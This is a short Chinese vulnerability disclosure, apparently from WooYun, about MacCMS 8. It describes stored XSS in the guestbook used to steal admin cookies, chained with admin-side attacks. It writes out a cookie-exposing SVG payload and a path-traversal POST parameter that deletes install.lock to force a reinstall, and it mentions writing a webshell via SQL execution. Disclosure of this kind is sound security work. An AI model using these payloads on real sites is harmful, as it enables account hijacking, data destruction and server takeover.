### 简要描述:
刚发了个后台getshell,但是屌丝的攻城狮要怎么进入后台呢?XSS呀
本应该两个洞一起发的,xss+后台getshell=getshell,手快发早了,只好再找个其它的接口来充数了
### 详细说明:
在留言板本处
插入`<svg onload=alert(document.cookie)>`即可
[<img src="https://images.seebug.org/upload/201405/25193534aec95779d1c1066c61f85c172c33e3d2.jpg" alt="31.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/25193534aec95779d1c1066c61f85c172c33e3d2.jpg)
打后台
[<img src="https://images.seebug.org/upload/201405/25193608332182930df587c2d136ebdaee8b0715.jpg" alt="32.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/25193608332182930df587c2d136ebdaee8b0715.jpg)
### 漏洞证明:
结合后台漏洞攻击:
1. 后台任意文件删除,可删除install.lock导致重装
接口
http://localhost/maccms8/admin/?m=extend-picdel
post参数:
`fname%5B%5D=..%2Fupload%2Fart%2F..%5C%5C..%5C%5C\inc\install.lock`
2. sql执行
之前也提到过,可写一句话后门
@农村教师 [WooYun: 苹果CMS全版本getshell打包第一弹](http://www.wooyun.org/bugs/wooyun-2014-052217)
3. 当然也可以用我刚发的后台getshell#2直接getshell
京公网安备 11010502034610号
暂无评论